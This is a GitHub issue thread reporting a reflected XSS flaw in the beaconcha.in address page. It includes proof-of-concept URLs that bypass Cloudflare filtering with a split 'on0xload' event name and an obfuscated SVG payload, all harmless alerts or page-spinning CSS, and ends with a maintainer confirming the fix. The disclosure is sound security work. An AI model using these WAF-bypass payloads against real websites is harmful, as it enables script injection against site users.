### ISSUE TITLE
Address Explorer allows XSS injection

### ISSUE THREAD

**Issue by pk910** [gobitfly/eth2-beaconchain-explorer#1582]
Heya guys,

There is currently no input validation on the address for the Address Page:
https://beaconcha.in/address/1234%3Cb%20style=%27color:red%27%3Eall%20red%20now1234

Should be fixed :)
At least cloudflare prevents injection of script tags & onload attributes 😉

**Comment by pk910** [comment]
Ok, script injection is possible too:

https://goerli.beaconcha.in/address/1234%3Csvg%20onL0xoad='alert(%22XSS%20ATTACK%22)'%3Eall%20red%20now1234

**Comment by Buttaa** [comment]
> Ok, script injection is possible too:
> 
> https://beaconcha.in/address/1234%3Csvg%20on0xload='alert(%22XSS%20ATTACK%22)'%3E1234
> 
> 0x in on0xload gets replaced, but cloudflare doesn't detect it 😉
> 
> Edit: (do a barrel roll just for fun 🤣) [https://beaconcha.in/address/1234%3Csvg%20on0xload=%22function%20inner(o)%7Breturn%20window[atob('c08=')[1]+'bject'].keys(o).filter(function(x)%7Breturn%20x.substr(0,5)=='inner'%7D)[0]%7D(function()%7Bvar%20a='-webkit-',b='transform:rotate(1turn);',c='transition:4s;';document.head[inner(document.head.__proto__.__proto__.__proto__)]+='%3Cstyle%3Ebody%7B'+a+b+a+c+b+c%7D)()%22%3E1234](https://beaconcha.in/address/1234%3Csvg%20on0xload=%22function%20inner(o)%7Breturn%20window%5Batob('c08=')%5B1%5D+'bject'%5D.keys(o).filter(function(x)%7Breturn%20x.substr(0,5)=='inner'%7D)%5B0%5D%7D(function()%7Bvar%20a='-webkit-',b='transform:rotate(1turn);',c='transition:4s;';document.head%5Binner(document.head.__proto__.__proto__.__proto__)%5D+='%3Cstyle%3Ebody%7B'+a+b+a+c+b+c%7D)()%22%3E1234)

thanks for reporting @pk910 . This is now fixed: 
https://beaconcha.in/address/1234%3Cb%20style=%27color:red%27%3Eall%20red%20now1234
